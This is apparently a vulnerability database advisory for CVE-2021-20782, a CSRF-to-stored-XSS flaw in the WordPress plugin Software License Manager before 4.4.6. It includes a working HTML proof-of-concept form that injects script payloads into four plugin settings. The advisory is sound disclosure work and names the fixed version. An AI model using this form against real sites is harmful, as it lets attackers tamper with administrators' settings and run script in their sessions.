logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Software License Manager < 4.4.6 - CSRF to Stored XSS

Description

The plugin did not have CSRF check on its settings page, nor sanitisation when outputting user input back. Attackers could make a logged in administrator change the plugin's settings, and put XSS payload in them.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp_lic_mgr_settings" method="POST">
      <input type="hidden" name="lic_creation_secret" value='"><script>alert(/XSS-1/)</script>' />
      <input type="hidden" name="lic_verification_secret" value='"><script>alert(/XSS-2/)</script>' />
      <input type="hidden" name="lic_prefix" value='"><script>alert(/XSS-3/)</script>' />
      <input type="hidden" name="default_max_domains" value='"><script>alert(/XSS-4/)</script>' />
      <input type="hidden" name="slm_save_settings" value=" Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

software-license-manager

Fixed in version 4.4.6

References

CVE

CVE-2021-20782

URL

https://plugins.trac.wordpress.org/changeset/2520250/

URL

https://jvn.jp/en/jp/JVN89054582/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

Koken Tokuda

Verified

Yes

WPVDB ID

578ba085-6cb8-4205-9884-5829cfafe0de

Timeline

Publicly Published

2021-04-23 (about 9 months ago)

Added

2021-04-23 (about 9 months ago)

Last Updated

2021-08-10 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin